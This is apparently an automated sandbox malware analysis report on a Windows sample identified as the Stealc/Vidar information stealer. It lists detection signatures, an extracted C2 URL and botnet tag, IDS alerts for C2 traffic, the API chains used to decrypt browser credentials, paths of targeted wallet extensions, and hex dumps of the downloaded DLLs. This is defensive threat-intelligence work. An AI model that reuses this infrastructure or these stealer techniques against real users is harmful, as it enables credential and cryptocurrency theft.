Windows Analysis Report
NK3SASJheq.exe

Overview

General Information

Sample name: NK3SASJheq.exe
renamed because original name is a hash value
Original sample name: 4eaa701f7c45f26c36fc162fa7c6ff85.exe
Analysis ID: 1540830
MD5: 4eaa701f7c45f26c36fc162fa7c6ff85
SHA1: a5e007859fa440d811459496ea50c72cf5345a68
SHA256: 74f3eca22bff147cedf63161cbb2d8d5ca64062cbba3e3c463ea5f2387bda0e8
Tags: exeStealcuser-abuse_ch
Infos:

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Found malware configuration
Source: 00000000.00000003.1488752523.0000000002460000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://62.204.41.176/edd20096ecef326d.php", "Botnet": "default8_cap"}
Source: 00000000.00000003.1488752523.0000000002460000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "http://62.204.41.176/edd20096ecef326d.php", "Botnet": "default8_cap"}
Multi AV Scanner detection for domain / URL
Source: http://62.204.41.176/edd20096ecef326d.phpowser Virustotal: Detection: 19% Perma Link
Multi AV Scanner detection for submitted file
Source: NK3SASJheq.exe ReversingLabs: Detection: 63%
Source: NK3SASJheq.exe Virustotal: Detection: 60% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: NK3SASJheq.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 0_2_00418EA0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 0_2_00409B60
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcatA,lstrcatA,PK11_FreeSlot,lstrcatA, 0_2_0040C820
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00407240
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00409AC0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBC6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6CBC6C80

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\NK3SASJheq.exe Unpacked PE file: 0.2.NK3SASJheq.exe.400000.1.unpack
Uses 32bit PE files
Source: NK3SASJheq.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: Binary string: mozglue.pdbP source: NK3SASJheq.exe, 00000000.00000002.1867943273.000000006CC2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: NK3SASJheq.exe, 00000000.00000002.1868312377.000000006CDEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: NK3SASJheq.exe, 00000000.00000002.1868312377.000000006CDEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: NK3SASJheq.exe, 00000000.00000002.1867943273.000000006CC2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040E430
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_004138B0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040BE70
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004016D0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040DA80
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040F6B0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 0_2_00414570
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00414910
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0040ED20
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040DE10
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 0_2_00413EA0
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49704 -> 62.204.41.176:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.8:49704 -> 62.204.41.176:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 62.204.41.176:80 -> 192.168.2.8:49704
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.8:49704 -> 62.204.41.176:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 62.204.41.176:80 -> 192.168.2.8:49704
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.8:49704 -> 62.204.41.176:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://62.204.41.176/edd20096ecef326d.php
Source: Malware configuration extractor URLs: http://62.204.41.176/edd20096ecef326d.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 06:38:24 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 06:38:31 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 06:38:33 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 06:38:34 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 